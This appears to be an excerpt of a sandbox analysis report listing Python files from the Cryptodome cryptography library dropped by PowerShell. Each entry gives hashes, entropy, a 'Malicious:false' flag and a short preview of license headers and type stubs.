                                                                                                                                                                                                              SSDEEP:96:5FYAgGWG6WcWUjmKokLSL0jcj9yYFtpZuObl9gbiYbwJbzk:58ZoUW0jcj9yYFtpZuObfgbiYbwJbzk
                                                                                                                                                                                                              MD5:39C62D7749149CEFCA56CD8924566FCE
                                                                                                                                                                                                              SHA1:354C63D5279D521E27C6AE448E3161812B5FD46E
                                                                                                                                                                                                              SHA-256:880C7604F5F9CBEAEE58E411F15880F0908F1A276F1E0B7817A6F9ECE8513FDB
                                                                                                                                                                                                              SHA-512:009CC6DEC9ACA8000038449669B6023935010F0D8B365018516A4BD870C51073591E9E3B0A91DD251F9196865BA946D4B08E6F65AB4CAC8097E2B0AD8329DA80
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Dict, Optional, Tuple, Union, overload..from typing_extensions import Literal....Buffer=bytes|bytearray|memoryview....from Cryptodome.Cipher._mode_ecb import EcbMode..from Cryptodome.Cipher._mode_cbc import CbcMode..from Cryptodome.Cipher._mode_cfb import CfbMode..from Cryptodome.Cipher._mode_ofb import OfbMode..from Cryptodome.Cipher._mode_ctr import CtrMode..from Cryptodome.Cipher._mode_openpgp import OpenPgpMode..from Cryptodome.Cipher._mode_ccm import CcmMode..from Cryptodome.Cipher._mode_eax import EaxMode..from Cryptodome.Cipher._mode_gcm import GcmMode..from Cryptodome.Cipher._mode_siv import SivMode..from Cryptodome.Cipher._mode_ocb import OcbMode....MODE_ECB: Literal[1]..MODE_CBC: Literal[2]..MODE_CFB: Literal[3]..MODE_OFB: Literal[5]..MODE_CTR: Literal[6]..MODE_OPENPGP: Literal[7]..MODE_CCM: Literal[8]..MODE_EAX: Literal[9]..MODE_SIV: Literal[10]..MODE_GCM: Literal[11]..MODE_OCB: Literal[12]....# MODE_ECB..@overload..def new(key: Buffer,.. mode: Lite
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7201
                                                                                                                                                                                                              Entropy (8bit):4.785991204595467
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:dHQHv8g/lA2jSkmRFmynD/t4AKdRYotKI:te8gdA82jnD/t4hjYotKI
                                                                                                                                                                                                              MD5:45EE5FBBE8CBB63C055973EC05CEEDB9
                                                                                                                                                                                                              SHA1:85FE3E624A7D3BC461C4A879B98A17BF44E32494
                                                                                                                                                                                                              SHA-256:57D9FCE3483474DD53D13A6DCDD3E6993EA5B3DD7480B7BC85C6A8D4A6E1DD9F
                                                                                                                                                                                                              SHA-512:B7A92309FCFF306310C97750E65C075238DD1D55BE5958850F69580299C77DA3997451A2F4A2C4BF1BB056A0CA4752367A4A23ACF5CDAE298AD616CB11D8D287
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# Cipher/ARC2.py : ARC2.py..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1048
                                                                                                                                                                                                              Entropy (8bit):4.936743654874026
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:1RENAAI1QJSzJSVJuJSpJQlJdvpB+yE2x/NEo0EDNqDNMN3zb1DoeRHYO:K+1AgGWG6xx9GIJqJejbFoeR4O
                                                                                                                                                                                                              MD5:ABC0C75BDCA256568739E75069C630CF
                                                                                                                                                                                                              SHA1:997D0DF67289A92CE181B9906C27EEBC96614021
                                                                                                                                                                                                              SHA-256:C724C1EB1442CAEEE70643125D96DE0A7793A2E8470775E5D1E7628FCA67AF82
                                                                                                                                                                                                              SHA-512:0E2729C803A2143AC70A26FD2D69067E8DA974BA56140326C71DAA3DF87286BB2E30C1C9A35BA4BACDDE7BFA34339F3B6EBD03150376A799CC9FC47FDCD79E6D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Cryptodome.Cipher._mode_ecb import EcbMode..from Cryptodome.Cipher._mode_cbc import CbcMode..from Cryptodome.Cipher._mode_cfb import CfbMode..from Cryptodome.Cipher._mode_ofb import OfbMode..from Cryptodome.Cipher._mode_ctr import CtrMode..from Cryptodome.Cipher._mode_openpgp import OpenPgpMode..from Cryptodome.Cipher._mode_eax import EaxMode....ARC2Mode = int....MODE_ECB: ARC2Mode..MODE_CBC: ARC2Mode..MODE_CFB: ARC2Mode..MODE_OFB: ARC2Mode..MODE_CTR: ARC2Mode..MODE_OPENPGP: ARC2Mode..MODE_EAX: ARC2Mode....def new(key: Buffer,.. mode: ARC2Mode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5264
                                                                                                                                                                                                              Entropy (8bit):4.723907196612077
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:dHIB0jcQHMsvI/S3oCFGddiIzkHzgirvNZEgR2lYvHipJjHeLEyEMWnP7a7j2VP4:doFQHvo7mIzodGgR2uvi/jqEyExPNOuG
                                                                                                                                                                                                              MD5:4B973975D3C6FCC22FD8C0582F4CB87A
                                                                                                                                                                                                              SHA1:FA05064405DDE7B726B3AB8CA259BC6A3B33048A
                                                                                                                                                                                                              SHA-256:0152A932BC4B0E5238AF5C9C145EF25A69E66E395804A700D60FBCEE80E5EC8C
                                                                                                                                                                                                              SHA-512:439A24E44AEFF220F266ED46F6F1D66B98CB0C35134D412A6084267C8DAD9E550EDFF10C2510B4E25A55B43BE6B8D4437B4393D05322E418E1606605408029A9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# Cipher/ARC4.py : ARC4..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===================================
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):438
                                                                                                                                                                                                              Entropy (8bit):4.892911336139007
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:1REYBdHgMJjWrMRyDWeXRyc1APyMFq6R5wnZ0R5AomWL7Ry/O:1REUAIWrQFeBFAfnRe+RGorVYO
                                                                                                                                                                                                              MD5:F00CD9D3130AA368D5F1F10B93E0A612
                                                                                                                                                                                                              SHA1:E9C27B3918320183E7366BD1D1294B48EAC93378
                                                                                                                                                                                                              SHA-256:28855BC2FF6531EFD40C42075EB5E506AD8A5F8D98B8041FB218725C7C484054
                                                                                                                                                                                                              SHA-512:228840E70CD9FAD2CB8EA202BD45931614A9E26C619ECDBC017E832B3588C85B0BBA97B762A804DB16BE3D19481B1CC17AB616FE66D46FD66DCB38B132D2994A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Any, Union, Iterable....Buffer = bytes|bytearray|memoryview....class ARC4Cipher:.. block_size: int.. key_size: int.... def __init__(self, key: Buffer, *args: Any, **kwargs: Any) -> None: ..... def encrypt(self, plaintext: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer) -> bytes: .......def new(key: Buffer, drop : int = ...) -> ARC4Cipher: .......block_size: int..key_size: Iterable[int]..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6135
                                                                                                                                                                                                              Entropy (8bit):4.916553423672799
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:doFQHvofgiN8jEuVDYsgiiJsJWkGI9gmJt4qeA//RFWotKj:deQHvogZSniiSYkGIOmJt4A/RYotKj
                                                                                                                                                                                                              MD5:CCFA29BA2814523ADF58AA9F7D0624EF
                                                                                                                                                                                                              SHA1:46BEA4FF5A931B96D08598C66530EA911F7E4BA8
                                                                                                                                                                                                              SHA-256:297D5A2E4EB626583EDC3E8C39194770B27773A8DF00C17D71CE0B7E6F5DE00B
                                                                                                                                                                                                              SHA-512:B87FADF5FB7BD18E50FED9D6B680848D0A2B99F94C1414DBD63C4F74A56B8EA4A82E71FFE56ADD3A1604182DEAA3D7EF438439F122CE9799A7045154688E65AB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# Cipher/Blowfish.py : Blowfish..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1084
                                                                                                                                                                                                              Entropy (8bit):4.920066075942964
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:1RENAAI1QJSzJSVJuJSpJQlJRvEStrF+olDNqDNMN3zb1DoeRHYO:K+1AgGWG6ltrF+wJqJejbFoeR4O
                                                                                                                                                                                                              MD5:D0AED6A00929EE2C6DA6B409C012F5E2
                                                                                                                                                                                                              SHA1:375CD151B552CA99011FF97581DD04BD33517FED
                                                                                                                                                                                                              SHA-256:A363EF5A112333F407470A884E23357F1C251FE733091B95DC8E86AE3FF73A6D
                                                                                                                                                                                                              SHA-512:147F1DE6BE32E1FCB88FFB0D37B765F5303CF2E7586CD405283FABD97A4D6714F011FDEE4A87B4777253BA41EC50C2A19D9DDACBB61C77E501D34D9999D55D08
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Cryptodome.Cipher._mode_ecb import EcbMode..from Cryptodome.Cipher._mode_cbc import CbcMode..from Cryptodome.Cipher._mode_cfb import CfbMode..from Cryptodome.Cipher._mode_ofb import OfbMode..from Cryptodome.Cipher._mode_ctr import CtrMode..from Cryptodome.Cipher._mode_openpgp import OpenPgpMode..from Cryptodome.Cipher._mode_eax import EaxMode....BlowfishMode = int....MODE_ECB: BlowfishMode..MODE_CBC: BlowfishMode..MODE_CFB: BlowfishMode..MODE_OFB: BlowfishMode..MODE_CTR: BlowfishMode..MODE_OPENPGP: BlowfishMode..MODE_EAX: BlowfishMode....def new(key: Buffer,.. mode: BlowfishMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMod
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6246
                                                                                                                                                                                                              Entropy (8bit):4.847637515435151
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:d2QHvVgQ/KSnrF4xkOUBRkUtmz5t4AyRYotKw:UeVgQ/n549aW75t4rYotKw
                                                                                                                                                                                                              MD5:5F1174F9FB32A4A834A3442B012374D4
                                                                                                                                                                                                              SHA1:089EC31BB4CCF147FE6C073185B3EE182165EA03
                                                                                                                                                                                                              SHA-256:E8BA9158AA0D7DC7A881CFD411602A4C626BB8CE6AAFC222C089DE5E6DFB9BC2
                                                                                                                                                                                                              SHA-512:F9A053BE1F119C93EC3566127B3B681DF053696BA3DECB0D922D20E70428B73C995C6127819A30C08337E7B778C17B1C60315B1E8CE717D8A2223C00D3332A2A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# Cipher/CAST.py : CAST..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===================================
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1049
                                                                                                                                                                                                              Entropy (8bit):4.934689035797648
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:1RENAAI1QJSzJSVJuJSpJQlJFivieL/tixsDOIosswDNqDNMN3zb1DoeRHYg3:K+1AgGWG6FQieL/tixsDOIYwJqJejbFF
                                                                                                                                                                                                              MD5:BD0C5452D0C862F46720CDFB944FA7BC
                                                                                                                                                                                                              SHA1:917D4020DBD2D124BAA89750FE347739BBF11D1B
                                                                                                                                                                                                              SHA-256:1469D7505976C0A27F8B23F64E402BE8A897B00898539B5BB6803792178DFE1D
                                                                                                                                                                                                              SHA-512:3143965EDF0205A84B28C34BA7F0EF005440D0F3EE431C06BC70E5FD09CEA0F0C2FF3C4C6E238D4628DB0AB1BE206DB60A4C76AD48B26B2FB3BEDDE2B1B81CCD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Cryptodome.Cipher._mode_ecb import EcbMode..from Cryptodome.Cipher._mode_cbc import CbcMode..from Cryptodome.Cipher._mode_cfb import CfbMode..from Cryptodome.Cipher._mode_ofb import OfbMode..from Cryptodome.Cipher._mode_ctr import CtrMode..from Cryptodome.Cipher._mode_openpgp import OpenPgpMode..from Cryptodome.Cipher._mode_eax import EaxMode....CASTMode = int....MODE_ECB: CASTMode..MODE_CBC: CASTMode..MODE_CFB: CASTMode..MODE_OFB: CASTMode..MODE_CTR: CASTMode..MODE_OPENPGP: CASTMode..MODE_EAX: CASTMode....def new(key: Buffer,.. mode: CASTMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11043
                                                                                                                                                                                                              Entropy (8bit):4.627558249565941
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:9qrskrs9t3q/InHYkUlRGziNzvPppkzBjfgEcTUjwzgLMZKPOYbCCsrBUpt:0rskrs9Vq+HwlCihP8xfgZF6PPOvBUt
                                                                                                                                                                                                              MD5:EF697474BC25613A648BE27414CCAE99
                                                                                                                                                                                                              SHA1:4895C1724F80C956E85747E48D310BEE98CF55AD
                                                                                                                                                                                                              SHA-256:2FE7CB61C0B983666475D35E906CF65D39F53D683A218F6712D3A973F33D35AC
                                                                                                                                                                                                              SHA-512:07A0CED0253586F94B89BD9C033D66DA2E905C724800B38AD45A058F58A6ADDE3BE38E4D9D8849552F8523722D62DC675A30C77A2041146F48C4390373408A40
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):798
                                                                                                                                                                                                              Entropy (8bit):4.852768717173627
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:1RE2AIM/sxQUADnRNne3yFnR3Fne3xodgxVYBy:3Me/4vesLehx+w
                                                                                                                                                                                                              MD5:7311A085F06CFB4AF892363A4CB21E0E
                                                                                                                                                                                                              SHA1:5DF2EEAE8BFD1978BE23CCDD2ECD712CFB79D6B1
                                                                                                                                                                                                              SHA-256:CE31A7182E4369DC8F65D929813CE67E7AFA67ECEED9821B124BBEAB13D9E668
                                                                                                                                                                                                              SHA-512:B6332CFB639FCF28701DF645276F21EA8535E6B401FDB6162E0F397B74FDBF47CECC10EE8B400278F268EBDAA1FF4C5A824BA408A03BE9A9CB9ADC167F61CA87
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Union, overload, Optional....Buffer = bytes|bytearray|memoryview....def _HChaCha20(key: Buffer, nonce: Buffer) -> bytearray: .......class ChaCha20Cipher:.. block_size: int.. nonce: bytes.... def __init__(self, key: Buffer, nonce: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... def seek(self, position: int) -> None: .......def new(key: Buffer, nonce: Optional[Buffer] = ...) -> ChaCha20Cipher: .......block_size: int..key_size: int..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11929
                                                                                                                                                                                                              Entropy (8bit):4.952377066202236
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:0qrskrs9t3q/IiAOqi/JHxbkg9XRV8psd6agIjjKVFtt:zrskrs9Vqai/j7XRViWnKVHt
                                                                                                                                                                                                              MD5:2C073F0BF828114C27C68B959628B243
                                                                                                                                                                                                              SHA1:1F816BBA3ED7D2BCAED9FC20B588D14266A109B8
                                                                                                                                                                                                              SHA-256:9C4C95382B36B400CBD421C4CE51C20C6B5F405296CBE85EDF7EA87327F01BF7
                                                                                                                                                                                                              SHA-512:70721C4BA6904BBC753EA40FD3439391FFD2A9CD1F5C7E337341426311AA8B2A56DB3F7BB5B07C5F82F11541BDDB984E8B32EEDD3548AABCCD4938561C9BE887
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2018, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1107
                                                                                                                                                                                                              Entropy (8bit):4.862920256864568
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:1RElsAIfUA0nRNne3yFnR3Fne3TP/Wwn90nf5GodLVYBy:tfUJvesLeiwanoo+w
                                                                                                                                                                                                              MD5:DED98A1B5B497FB5816021E8B6E5F6F4
                                                                                                                                                                                                              SHA1:977F227DD05557AEDD8C40E653D74AEAF3734A43
                                                                                                                                                                                                              SHA-256:6D880A3628C47D9BCE851019C82720D570F44699E1B453AF432AE4A7B20A1273
                                                                                                                                                                                                              SHA-512:C6494CE19133C645285D7ACA56AD2F0D9E978ED2C4C7BB58A9C90B095A360DA3881E0D6F308F3B01508A331CCBF070690543BAC826FF47E8F9153949D92D9EF4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Union, Tuple, overload, Optional....Buffer = bytes|bytearray|memoryview....class ChaCha20Poly1305Cipher:.. nonce: bytes.... def __init__(self, key: Buffer, nonce: Buffer) -> None: ..... def update(self, data: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, received_mac_tag: str) -> None: ..... def encrypt_and_digest(self, plaintext: Buffer) -> Tuple[bytes, bytes]: ..... def decrypt_and_verify(self, ciphertext: Buffer, received_mac_tag: Buffer) -> bytes: .......def new(key
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6121
                                                                                                                                                                                                              Entropy (8bit):4.866819320475539
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:dOFQHvotgiNiCuyG6DH5K0kmIbU6Ct4qeAYZRFWotK0:dcQHv2gB7C5K0kmIct4NZRYotK0
                                                                                                                                                                                                              MD5:2B3DBAEE6FAB3A0C0D01BBFE16607C40
                                                                                                                                                                                                              SHA1:E218D06E4B9FBC41AA56BCFE73226C9ABC108343
                                                                                                                                                                                                              SHA-256:41AEF064734CF279388BCD875F0252D27FDFB3565904B7FA1935F63C82F7EF47
                                                                                                                                                                                                              SHA-512:A7DDC5E29DCBEC23229F199E97B1D6D65CAB1F17ADD25C5F1823BBD98E7917C524B714C2793934024913154B38ACBF42B9B64638579ADA0B2CF1207B20BDF4AB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# Cipher/DES.py : DES..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# =====================================
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1029
                                                                                                                                                                                                              Entropy (8bit):4.895477988326694
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:1RENAAI1QJSzJSVJuJSpJQlJiiv7Hoc6iTD3IouwDNqDNMN3zb1DoeRHYBy:K+1AgGWG6N7XY6JqJejbFoeR4w
                                                                                                                                                                                                              MD5:F8300805D96A9983E023F2F7860C6E72
                                                                                                                                                                                                              SHA1:C80FDD36709906927D8355E2E937AB89E40A8C7C
                                                                                                                                                                                                              SHA-256:BFBAF8AEC79DFC45CB8C26053797A43735A7AACA50AA5504FE080E900A6A38E6
                                                                                                                                                                                                              SHA-512:32F47B45D4221E66CE58C49C2564C3DF40416C772C2958C1E374719DE3884945D48128704A18686A5491665B61817E592DC8626592F44064FEFCB649F0F10C71
                                                                                                                                                                                                              Malicious:false
